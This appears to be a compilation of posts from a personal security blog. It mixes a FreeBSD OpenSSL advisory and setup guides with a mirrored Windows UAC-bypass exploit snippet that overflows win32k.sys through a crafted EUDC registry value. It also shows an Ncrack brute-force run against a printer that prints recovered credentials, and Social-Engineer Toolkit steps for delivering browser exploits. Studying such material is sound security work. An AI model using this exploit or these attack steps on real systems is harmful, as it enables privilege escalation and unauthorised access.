I noticed an email this morning mentioned a openssl issue that affects the FreeBSD platform and I wanted to mention it again in case anyone missed it when it came out yesterday.

I just  patched my system  according to the steps in the advisory and I will report back if I experience any issues after patching.

I. Background

FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.

II. Problem Description

A race condition exists in the OpenSSL TLS server extension code
parsing when used in a multi-threaded application, which uses
OpenSSL’s internal caching mechanism. The race condition can lead to
a buffer overflow. [CVE-2010-3864]

A double free exists in the SSL client ECDH handling code, when
processing specially crafted public keys with invalid prime
numbers. [CVE-2010-2939]

III. Impact

For affected server applications, an attacker may be able to utilize
the buffer overflow to crash the application or potentially run
arbitrary code with the privileges of the application. [CVE-2010-3864].

It may be possible to cause a DoS or potentially execute arbitrary in
the context of the user connection to a malicious SSL server.
[CVE-2010-2939]

IV. Workaround

No workaround is available, but CVE-2010-3864 only affects FreeBSD 8.0
and later.

It should also be noted that CVE-2010-3864 affects neither the Apache
HTTP server nor Stunnel.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch
dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch.asc

[FreeBSD 8.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make install

NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
<URL:http://www.FreeBSD.org/handbook/makeworld.html>

3) To update your vulnerable system via a binary patch:

Systems running 7.1-RELEASE, 7.3-RELEASE, 8.0-RELEASE or 8.1-RELEASE
on the i386 or amd64 platforms can be updated via the
freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Links:

http://www.freebsd.org/security/advisories.html

http://security.freebsd.org/advisories/FreeBSD-SA-10:10.openssl.asc

Updated with Q&A section at the bottom.

As referenced in my last post, a public release  proof of concept (POC) for bypassing the  User Access Control (UAC) feature on Windows Vista and 7 operating systems is in the wild. The vulnerability is a buffer overflow in kernel (win32k.sys). The vulnerability exist in a function that queries the registry so in order to exploit this the attacker has to be able to create a special (malicious) registry key.

The author’s PoC managed to find such a key that can be created by a normal user on Windows Vista and 7 (so, a user that does not even have any administrative privileges). The PoC code creates such a registry key and calls another library which tries to read the key and during that process it ends up calling the vulnerable code in win32k.sys.

According to the author of the POC code ,” I found a registry key which can be manipulated with only user rights, by changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries HKCU\EUDC\[Language]\SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on stack is a UNICODE_STRING structure, of which the first ULONG value in this structure represents the length of the string buffer, but if the value in registry is REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwrites the stack.”

POC Test:

Version Windows 7 Professional

Steps:

1. I first created a standard none privileged user, and from the command prompt typed “whoami” to identify my user, I then typed “net users” to few all available users on the system. Lastly I tried to create a new user with “NET USER testhack P@$$w0rd /add” and received access denied as expected.
2. Next download the POC code, and extract it to a folder of your choice, then from the command prompt change directory to that folder and execute the “poc.exe” file. From here on you will have escalated privileges of the “nt/system user”.

At this point it’s GAME OVER!!

Updated with a few questions I emailed the author of the POC exploit

Me: How did you get your start in information security?

POC Author: By the randomness of the universe, I started one day when I discovered debugging

Me: How long have you been doing exploit development?

POC Author: I’ve been doing reverse engineering since 2004 but not exclusively in exploit development.

Me: How did you discovered this flaw?

POC Author: By chance when I read WDK or windows driver kit code samples

Me: What steps did you take to notify the vendor about this issue? What time line did Microsoft give for a patch to this issue?

POC Author: This flaw was reported with enough detail and the same PoC released on the internet to Microsoft Security Response Center  MSRC. They didn’t give a time line. Actually the guy who was issued to work on this never contacted me!

Me: Since this disclosure were you contacted by Microsoft or anyone else who were upset about your decision to disclose this flaw?

POC Author: No, despite the fact that my initial CodeProject article were brought down, probably due to the pressure from MS.

Me: Realistically how long do you think it will take before this flaw is patched?

POC Author: First of all I wouldn’t pick a day before Thanksgiving to publish this if I’m not mad enough that this flaw remains unpatched almost a year since Microsoft’s first acknowledge. Due to the nature that the flaw is from the design of an API, and it has been widely used by third party drivers, probably this won’t be entirely fixed until Windows 8. But meanwhile, MS could have taken measures to block such exploits, such as restricting the API not to query certain types of value to avoid ambiguity.

Me: Were you giving a reason by codeprojects for pulling your posting?

POC Author: Yes, they give me the responsible disclosure thing.

Additional comments by author:

If I have to keep my mouth shut until MS release a patch for such exploit, then probably everyone will be threatened more than now, because from what I know, there had been malware which use this exploit since August, not none said by some security companies. Those exploit a registry key ActiveTimeBias which works perfectly on all versions of Windows, to bypass proactive defense and execute malicious code.

I must say thank you for answering my questions and I support your decision for releasing this PoC and details about the flaw, if MS was given a full year to take care of this and they didn’t even respond to you why should you keep quiet!

References:

http://isc.sans.edu/diary.html?storyid=9988

http://www.exploit-db.com/exploits/15609/

Now the reason for this post is just to mirror what I think should be public knowledge and not be kept hidden since it was initially release yesterday. Today when I revisited the original site to download the POC and do some testing in my lab I  noticed it was removed. After looking around online a bit I found a few sites there were mirroring the information and I decided to do the same.

Bypassing UAC with User Privilege under Windows Vista/7

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);        // Get current code page
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL, &hKey, NULL);
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);

__try
{
    EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);

License

About the Author

noobpwnftw

Being a father of four with my oldest already at the age where he needs to use the computer I started asking myself do I have the ideal setup? And the answer was not really. Don’t get me wrong I have a PF sense firewall and a few other protections in place however I wanted to build a solution from the ground up instead of just installing a bunch of  packages on my firewall and not really understanding whats going on in the back end.

My proposed solution is to have a system that caches and scans web traffic for viruses as well as preform some sort of content filtering  based on various detection methods (phrase matching, PICS filtering and URL filtering etc) and most importantly the solution must be **FREE** to implement. I am sure the are other solutions in place that does a better job than the one I have outlined and by all means feel free to comment or email me.

Tools I plan on using:

• FreeBSD 8.1
• ClamAV
• Squid
• Dansguardian
• Privoxy
• HAVP

FreeBSD: If you are going to choose an OS I would suggest BSD, because in my opinion its one of the most secure and well build system out there.

ClamAV: Is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates.

Squid: Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages.

Dansguardian: Is an award winning Open Source web content filter which currently runs on Linux, FreeBSD, OpenBSD, NetBSD, Mac OS X, HP-UX, and Solaris. It filters the actual content of pages based on many methods including phrase matching, PICS filtering and URL filtering. It does not purely filter based on a banned list of sites like lesser totally commercial filters.

Privoxy: Is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes.

HAVP (HTTP AntiVirus proxy): is a proxy with an anti-virus filter. It does not cache or filter content.

Setup Phase

The first thing you need to do before you start installing your apps is to make sure you set a static address up on your BSD box, in my case I have freeBSD 8.1:

vi /etc/rc.conf and add the following lines, my gateway was 192.168.1.1 and IP 192.168.1.5

defaultroute=”192.168.1.1″
hostname=”bsdsrvr.infolookup.com”
ifconfig_le0=”192.168.1.5 netmask 255.255.255.0″
inetd_enable=”YES”

I would also run freebsd-update fetch and  freebsd-update install since it never hurts to have an updated repo. Now this is as far as I will go with this post, in my next post I will go through the install, config and testing. Comments and suggestions are always welcome.

–Sherwyn AKA Infolookup

References

http://www.br.freebsd.org/where.html

http://www.clamav.net/lang/en/

http://www.server-side.de/

http://www.privoxy.org/

http://wiki.linuxmce.org/index.php/Installing_Dansguardian

http://www.mustnofee.com/tutorials/37-tutorials/67-setting-up-squid-on-freebsd

http://bsdmag.org/

http://www.squid-cache.org/

What is Ncrack?

Taken from the author’s site…

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behavior based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated brute-forcing attacks, timing templates for ease of use, run-time interaction similar to Nmap’s and many more.

Ncrack was started as a “Google Summer of Code” Project in 2009. While it is already useful for some purposes, it is still unfinished, alpha quality software. It is released as a standalone tool and can be downloaded from the section below. Be sure to read the Ncrack man page to fully understand Ncrack usage.

Modules

Ncrack’s architecture is modular with each module corresponding to one particular service or protocol. Currently, Ncrack supports the protocols FTP, TELNET, SSH and HTTP(S) (basic authentication). Below we describe some key points for each of them.

FTP Module

FTP authentication is quite fast, since there is very little protocol negotiation overhead. Most FTP daemons allow 3 to 6 authentication attempts but usually impose a certain delay before replying with the results of a failed attempt. Filezilla is one of the most characteristic examples of this case, where the time delay is so great, that it is usually faster to open more connections against it, with each of them doing only 1 authentication per connection.

TELNET Module

Telnet daemons have been largely substituted by their safer ‘counterpart’ of SSH. However, there are many boxes, mainly routers or printers, that still rely on Telnet for remote access. Usually these are also easier to crack, since default passwords for them are publicly known. The drawback is that telnet is a rather slow protocol, so you shouldn’t be expecting really high rates against it.

SSH Module

SSH is one of the most prevalent protocols in today’s networks. For this reason, a special library, named opensshlib and based on code from OpenSSH, was specifically build and tailored for Ncrack’s needs. Opensshlib ships in with Ncrack, so SSH support comes out of the box. OpenSSL will have to be installed in Unix systems though. Windows OpenSSL dlls are included in Ncrack, so Windows users shouldn’t be worrying about it at all.

SSH brute-forcing holds many pitfalls and challenges, and you are well advised to read a paper that was written to explain them. The latest version of the “Hacking the OpenSSH library for Ncrack” document can be found under docs/openssh_library.txt or at http://sock-raw.org/papers/openssh_library

HTTP(S) Module

The HTTP Module currently supports basic authentication only, however additional methods will be added soon. Ncrack tries to use the “Keepalive” HTTP option, whenever possible, which leads to really high speeds, since that allows dozens of attempts to be carried out per connection. The HTTP module can also be called over SSL.

SMB Module

The SMB module currently works over raw TCP. NetBIOS isn’t supported yet. This protocol allows for high parallelization, so users could potentially increase the number of concurrent probes against it. SMB is frequently used for file-sharing among other things and is one of the most ubiquitous protocols, being present in both Unix and Windows environments.

RDP Module

RDP (Remote Desktop Protocol) is a proprietary protocol developed by Microsoft for the purpose of providing remote terminal services by transferring graphics display information from the remote computer to the user and transporting input commands from the user to the remote computer. Fortunately, Microsoft recently decided to open the protocol’s internal workings to the public and has provided official documentation, which can be found at http://msdn.microsoft.com/en-us/library/cc240445%28v=PROT.10%29.aspx

RDP is one of the most complex protocols, requiring the exchange of many packets, even for just the authentication phase. For this reason, cracking it takes a lot of time and this is probably the slowest module. The connection phase is briefly described at http://msdn.microsoft.com/en-us/library/cc240452%28v=PROT.10%29.aspx where you can also see a diagram of the various packets involved. Care must be taken against RDP servers in Windows XP versions, since they can’t handle multiple connections at the same time. It is advised to use a very slow timing template or even better limit the maximum parallel connections using timing options such as CL (Connection Limit) or cd (connection delay) against Windows XP (and relevant) RDP servers. Windows Vista and above don’t suffer from the same limitation.

POP3(S) Module

POP3 support is still experimental and hasn’t been thoroughly tested. You can expect it to work against common mail servers, nevertheless.

Installation and Basic usage:

Once you have download the latest version from the Ncrack website, the installation process is as follows:

tar -xzf ncrack-0.3ALPHA.tar.gz
cd ncrack-0.3ALPHA
./configure
make
su root
make install

Or download the development svn:

svn co –username guest –password “” svn://svn.insecure.org/ncrack

Before you attempt to start  using this tool its recommended that you first read the Manual, either online or issue “man ncrack”, from your console.

Quick Examples:

I first fired up nmap and ran it against a Lexmark network printer.

infolookup@TestSrvr:~# nmap -A 172.29.19.85

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-09-22 22:26 EDT
Nmap scan report for rnp92a8d6.localhost (172.29.19.85)
Host is up (0.00020s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        Lanier LP125cx/LP126cn ftpd 4.15.1
|_ftp-bounce: bounce working!
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp   open  tcpwrapped
80/tcp   open  http       Ricoh Aficio printer web image monitor (Web-Server httpd 3.0)
|_html-title: Web Image Monitor
|_http-methods: No Allow or Public header in OPTIONS response (status code 501)
139/tcp  open  tcpwrapped
514/tcp  open  login      Aficio/NRG/Ricoh printer logind
515/tcp  open  printer    lpd (error: Illegal service request)
631/tcp  open  ipp        NRG copier or Ricoh Aficio printer (Embedded Web-Server 3.0)
9100/tcp open  jetdirect?
MAC Address: 00:00:23:92:G8:F1 (Ricoh Company)
Device type: printer
Running: Ricoh embedded, Savin embedded
OS details: Ricoh Aficio 3045/3245C multifunction printer, Savin 8025e multifunction printer
Network Distance: 1 hop
Service Info: Device: printer

Now that we have our open ports  we can now  feed them to ncrack to test if we have any weak passwords. As you can see from the below command I am using NCrack to look for weak authentication via Telnet, FTP, HTTP. You can either specify the port number, the service name or both.

infolookup@TestSrvr:~# ncrack -v –log-errors /tmp/ncrack.txt  172.29.19.85 -p telnet,ftp:21,http

Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2010-09-22 22:41 EDT

Failed to resolve given hostname/IP: . Note that you can’t use ‘/mask’ AND ’1-4,7,100-’ style IP ranges
http://172.29.19.85:80 finished.
Discovered credentials on ftp://172.29.19.85:21 ‘root’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘administrator’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘guest’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘info’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘security’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘support’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘abuse’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘admin’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘postmaster’ ’123456′
Discovered credentials on ftp://172.29.19.85:21 ‘lists’ ’123456′
caught SIGINT signal, cleaning up
Saved current session state at: /root/.ncrack/restore.2010-09-22_22-42

We can conclude from the above test that our FTP service was mis-configured because we left “Anonymous FTP login ” turned on. Our Nmap scan shown us this and we were able to confirm it, since every possible login via FTP was granted access.

Now this was just a basic test, however you can do much more like stop and restart your session, specify your own username and password list, and much more. If you don’t have a good password list visit –>  SkullSecurity , and I must end by saying ” for an Alpha release I am very impressed”, and I cant wait to see what the future has to offer for this program.

Reference links:

http://nmap.org/ncrack/man.html

Unless you don’t follow the Infosec/Social engineering scene you should know what the Social-Engineering toolkit is, and that a new version was  release today, version 0.7 aka “Swagger Wagon”. However since I am really happy that I have a new version to play with I will try to assist anyone that’s new to SET by pointing you in the right direction to get you started and by sharing a bit of information on how the project got started.

I did a post a few weeks back on using version 0.6.1 to exploit the Microsoft windows OS DLL flaw which you can view here. However today’s posting is all about the new features that you are getting with version 0.7, what has been fixed and a mini interview with the creator of SET none other than Mr David Kennedy aka ReL1k.

For a quick recap..

What is SET?

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

New features and bug fixes :

* Fixed the NAT/Port FWD descriptions to be a little bit more descriptive
* Bug fixes on payload gen with x64 bit payloads in Metasploit
* Added new Multi-Attack Payload option to utilize multiple attack vectors
* Incorporated Multi-Attack into each web attack vector
* Added a PID management system in SET for stray processes
* Cleaned up payloadgen code and SET code to reflect new multiattack changes
* Added the web jacking attack vector by white_sheep, emgent, and the Back|Track team
* Fixed an issue with ARP Cache defaulting, it should now poison everyone
* Added better error handling within the SET menus, still needs a bit more work
* Cleaned up color schema and removed old code
* Added the Adobe CoolType SING Table ‘uniqueName’ Overflow zero day from Metasploit in spear  phishing
* Added two more Teensy based payloads, thanks Garland!
* Added HTML support for Spear-Phishing Attack Vector
* Added HTML support when WEBATTACK_EMAIL=ON for web attack vector
* Added the Adobe Cooltype SING Table Overflow zero day for browser exploit
* Added the new SET User Manual to readme/. This is a big update and has updated content for 0.7
* Fixed a simple yes or no answer when requirements for SET were not met

If you are new to SET you should start here:

1. http://www.secmaniac.com/
2. http://www.social-engineer.org
3. IRC.freenode.net #social-engineer
4. http://www.vimeo.com/14837669
5. http://www.offensive-security.com/metasploit-unleashed/SET

Mini interview with SET’s creator David Kennedy aka “ReL1k”:

Question: Do you think social engineering is a growing threat or would you say its something of the pass?

Answer: Social-Engineering has always been problematic however it is ever increasing because of the controls put in place on the external perimeter. Your typically not seeing the same types of attacks externally facing as you once were. This is a good thing and a testament that security is starting to work in the industry however, with social-engineering you face a whole new slew of problems.

Q: Where did the name SET came from?

A: Me and Chris from social-engineer.org were sitting on skype talking about making a tool, kind of just came to mind and stuck with it.. We never had any idea it would get this big.

Q: What made you start this project?

A: When Chris Hadnagy (loganWHD) was starting up social-engineer.org, we were sitting there talking and came to the conclusion that there really was no penetration testing tools out there dedicated to social-engineering. We knew the effects of social-engineering and how easy it was, but there was nothing out there to help aid in testing social-engineering.

Q:Who was your intended audiences for this framework?

A: I try to keep SET as easy as possible, you have the basic setup, but then you can customize and do more advanced setup based of your needs. It’s really intended for super technical folks as well as hobbyists.

Q: What other framework like this can SET be compared too?

A: I’m not sure there are other frameworks out there that can be compared to SET, it’s specially designed to Social-Engineering, not something that’s really out there. SET can’t be compared to something like a exploitation framework like Metasploit who has full time commitment and years of maturity with some of the most brilliant minds in the industry. But someday hope SET will reach that level on the social-engineer side.

Q: Do you plan on commercialising this project at any point in time and start charging for its use?

A: Never, SET will always remain free and open source. That has always and will always be my goal. *Awesome answer *

Q: What was the total number of downloads for version 0.6.1?

A: SET v0.6.1 has over 1.3 million downloads last time I checked. These are unique IP addresses, not downloads over and over again. I think that’s awesome in some fashions, but scary in another…

Q: What are a few of your favorite features in this new version?

A: The multi-attack is awesome, the ability to load multiple attack vectors in one, then have multiple attacks targeted at a victim. The webjacking is really awesome too, it’s a really convincing attack.

Q: What inspired your new code name for the this version?

A: Well 0.6 was inspired on my favorite drink, Arnold Palmers. This drink for some reason gets me to spit out thousands of lines of code effortlessly. Now in 0.7 (swagger wagon), me and my wife recently added two twins to our household and bought a mini-van, so the family was the influence for this version code name . *I think the should give you a free case for saying that *

Q: What’s the best way someone can contribute to this project if the have ideas and suggestions?

A: Email is the best route, I really try to take every one’s recommendations and if it fits, incorporate it into SET. You can always find me on IRC as well on #social-engineer.org. Or like Kos did, he sent me his python code and I worked it into the 0.6 version of SET. I’m always looking at improving SET and making it better, it wouldn’t be anywhere near where it is now without the help of everyone contributing with bug fixes, ideas, and additions.

So there you have it, a new version is out if you haven’t had a chance to play with older versions now is your change at the new and improve version. I am sure in  few months I will be doing another blog posting if ReL1k keeps drinking those “Arnold Palmers” . Go get your copy, send in your sample codes, report your bugs, and lets make this version hit over 2M downloads.

I  appeared on the Linux Basix podcast once more, I am becoming a regular . Below are some of the things I spoke of during my segment.

Discussion Links:

1. Symantec Snoop Dogg rap contest site rickrolled: Symantec’s attempts to link up with Snoop Dogg to launch a cybercrime rap contest, to bring about awareness on the issue. However it turned out that the site had several vulnerabilities and had to be taken down for maintenance, read more over at  http://www.theregister.co.uk/2010/09/03/symantec_rap_contest_farce/.
2. Facebook adds new remote log-out security feature: Facebook on Thursday announced a new security feature that will allow users to see if they are logged into their accounts on a different computer and to remotely log out if so. This can also be used to see if someone has your password and has been logging in when you are not around. The new security feature follows a Login Notification feature the company announced in May that lets users tell Facebook to notify them via e-mail or SMS when a new computer or device is used to log into their account, read more over at  http://news.cnet.com/8301-27080_3-20015482-245.html .
3. Rosetta Stone for Unix: The goal of this site is to give you a command syntax comparison between Linux, Unix, MAC OSX, and a few others, visit http://bhami.com/rosetta.html and have some fun. Another good site with a collection of Unix/Linux/BSD commands is –> http://cb.vu/unixtoolbox.xhtml which gives you the option to save the page as a new PDF ebook.
4. Malware hosted on Google Code project site: Malicious individuals are using the Google Code repository to host Trojans horses, backdoors and password stealing keyloggers, according to researchers at Zscaler. The researchers found a malicious project hosted on the free Google Code site with about 50+ malware executables stored in the download section of the project. “The first malicious file was uploaded on June 24, 2010 and was still active at the end of August this year, proving that Google is slow to find and remove malicious projects”, read more over at http://www.zdnet.com/blog/security/malware-hosted-on-google-code-project-site/7247

Tech Segment: Installing and using Xplico

What is Xplico?

The goal of Xplico is extract from an internet traffic capture the applications data contained. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is an open source Network Forensic Analysis Tool (NFAT).

Features

• Protocols supported: HTTP, SIP, IMAP, POP, SMTP, TCP, UDP, IPv6, …;
• Port Independent Protocol Identification (PIPI) for each application protocol;
• Multithreading;
• Output data and information in SQLite database or Mysql database and/or files;
• At each data reassembled by Xplico is associated a XML file that uniquely identifies the flows and the pcap containing the data reassembled;
• Realtime elaboration (depends on the number of flows, the types of protocols and by the performance of computer -RAM, CPU, HD access time, …-);
• TCP reassembly with ACK verification for any packet or soft ACK verification;
• Reverse DNS lookup from DNS packages contained in the inputs files (pcap), not from external DNS server;
• No size limit on data entry or the number of files entrance (the only limit is HD size);
• IPv4 and IPv6 support
• Modularity. Each Xplico component is modular. The input interface, the protocol decoder (Dissector) and the output interface (dispatcer) are all modules
• The ability to easily create any kind of dispatcer with which to organize the data extracted in the most appropriate and useful to you

Installing and Configuring:

First begin with a little sudo fu and install the following packages:

apt-get install tcpdump tshark apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite3-dev php5-cli libapache2-mod-php5 libx11-dev libxt-dev libxaw7-dev python-all sqlite3 recode sox lame libnet1 libnet1-dev libmysqlclient15-dev

Create a temp directory to wget your files too with mkdir Xbuild and cd Xbuild

Download Xplico source code from SorceForge or BerliOS

tar zxvf xplico-0.5.x.tgz

wget http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.6.tar.gz
tar zxvf GeoIP-1.4.6.tar.gz

cd GeoIP-1.4.6
./configure
make

cd ..
rm -f *.tar.gz

cd xplico
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
gzip -d GeoLiteCity.dat.gz
rm -f *dat.gz
make

cd ..
wget http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-8.70.tar.bz2
tar jxvf ghostpdl-8.70.tar.bz2

The ghostpcl contains the pcl6 application that it is necessary to “network printer job”

rm -f *.bz2
cd ghostpdl-8.70
make

Wait for some time

cd ..
cp ghostpdl-8.70/main/obj/pcl6 xplico-0.5.x
rm -rf ghostpdl-8.70

Download videosnarf from http://ucsniff.sourceforge.net/videosnarf.html. Note for 64 bits architectures: Some codec libraries are proprietary and are only for 32bits architecture. The only solution in this case is this: http://forum.xplico.org/viewtopic.php?p=453#p453

wget http://downloads.sourceforge.net/project/ucsniff/videosnarf/videosnarf-0.63.tar.gz
tar xvzf videosnarf-0.63.tar.gz
cd videosnarf-0.63
./configure
make
cd ..
cp videosnarf-0.63/src/videosnarf xplico-0.5.x

Install Xplico

cd xplico-0.5.x
make install

Copy Apache configuration file

cp /opt/xplico/cfg/apache_xi /etc/apache2/sites-enabled/xplico

After this we have to change Apache ports file to add port of XI. Then, in /etc/apache2/ports.conf add:

# xplico Host port
NameVirtualHost *:9876
Listen 9876

We must also modify the php.ini file to allow uploads (pcap) files. Edit /etc/php5/apache2/php.ini.

The lines to modify are:\\
**post_max_size = 100M** \\
**upload_max_filesize = 100M**\\

Enable mode rewrite in Apache:

a2enmod rewrite

And finally restart Apache:

/etc/init.d/apache2 restart

You can find much more information and documentation on the wiki –> http://wiki.xplico.org.

Uploading your first PCAP file:

1. Log into the user inter by going to http://xplicoip:9876
2. Username:xplico and password:xplico please change after
3. Click on Case to create a new case.
4. Click on session to create a new session
5. Click on newly created session within the newly created case and click upload–> browse to your capturefile.pcap.
6. You can also create a live stream and just have the host sit there passively listening.

Sit back wait for xplico to works it’s magic and then browse your results. View this page to see screen-shots of all the various options of xplico –> http://wiki.xplico.org/doku.php?id=web_interface. Now all your have to do is go sniffing, read the manual and have fun viewing your results.

the below Post came through Full Disclosure mailing this today and I figured for something this interesting it merited a re-post.

Month of Abysssec Undisclosed Bugs – Day 1 From: muts
Date: Wed, 01 Sep 2010 15:21:34 +0200

Hi Lists,

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB).

During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc.

The exploits, papers and PoCs will be featured on the Exploit-Database (http://www.exploit-db.com), averaging one 0day and one binary analysis a day.

Get your hard-hats on, your VM¹s and debugging tools organized ­ it’s going to be a an intensive ride.

Posted today – MOAUB Day 1:

1– http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/

2 – http://www.exploit-db.com/moaub-1-cpanel-php-restriction-bypass-vulnerability/

Enjoy,
Abysssec and the Exploit Database Team

Since these are going to be mostly 0-days or currently unpatched vulnerabilities, it might be time to update to the latest versions of your various applications. Lastly if you have not been looking at your various logs, and consoles this week might be a good time to start.

I have to admit that I am a bit late to the party, but I see this as an opportunity to try out SET and learn a bit about the DLL hijacking issue at the same time.

Last Thursday, Acros, a Slovenian security firm, published an advisory that identified what they call a “binary planting” flaw in iTunes. Essentially, if you open a file type associated with iTunes from a remote network share, iTunes will also try to load one more DLLs from the share. Even if the file that the user opened is completely safe, a malicious DLL can be supplied that will lead to code execution.

HD Moore stated “While working on the Windows Shortcut exploit, he stumbled on this class of bugs and identified a couple dozen applications that seemed to be affected by this problem.  iTunes was one of these applications and the details in the Acros advisory made it clear that this was indeed the same flaw. He was planning to finish the advisories and start contacting vendors on August 20th (last Friday). The  Acros advisory on the 18th threw a wrench into this process.

Microsoft later release the following details  in an advisory:

Microsoft is aware that research has been published detailing a remote attack vector for a class of vulnerabilities that affects how applications load external libraries.

This issue is caused by specific insecure programming practices that allow so-called “binary planting” or “DLL preloading attacks”. These practices could allow an attacker to remotely execute arbitrary code in the context of the user running the vulnerable application when the user opens a file from an untrusted location.

This issue is caused by applications passing an insufficiently qualified path when loading an external library. Microsoft has issued guidance to developers in the MSDN article, Dynamic-Link Library Security, on how to correctly use the available application programming interfaces to prevent this class of vulnerability. Microsoft is also actively reaching out to third-party vendors through the Microsoft Vulnerability Research Program to inform them of the mitigations available in the operating system. Microsoft is also actively investigating which of its own applications may be affected.

In addition to this guidance, Microsoft is releasing a tool that allows system administrators to mitigate the risk of this new attack vector by altering the library loading behavior system-wide or for specific applications. This advisory describes the functionality of this tool and other actions that customers can take to help protect their systems.

Mitigating Factors:

• This issue only affects applications that do not load external libraries securely. Microsoft has previously published guidelines for developers in the MSDN article, Dynamic-Link Library Security, that recommend alternate methods to load libraries that are safe against these attacks.
• For an attack to be successful, a user must visit an untrusted remote file system location or WebDAV share and open a document from this location that is then loaded by a vulnerable application.

• The file sharing protocol SMB is often disabled on the perimeter firewall. This limits the possible attack vectors for this vulnerability.

Demo Time with SET… Thanks to Dave for his wonderful video that he posted this afternoon, I can now use this as my base for this demo.

What is SET?

The Social-Engineer Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform. You can download the Social-Engineering Toolkit through subversion by simply typing this in Back|Track 4 or any other Linux OS.

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

However BT4 now comes with SET located under /pentest/exploits/set, from here you can simply launch SET with a ./set and get your latest updates by selecting option 8.

SET can do tons of cool stuff and I have included a few links at the end of this post that explains them in details, and I have a few post to come that will also go into some more details. However for todays demo I will only be using a few of those features.

Launch and update SET

If you are using BackTrack4 you can find SET located under /pentest/exploits/set, you can launch it with ./set and as stated above select option 8 to get the latest and greatest updates.

Choose your path to pwnage

I selected Option 2 or “Web Attack  Vectors” which is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Select option 2 once more “The Metasploit Browser Exploit Method” this method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

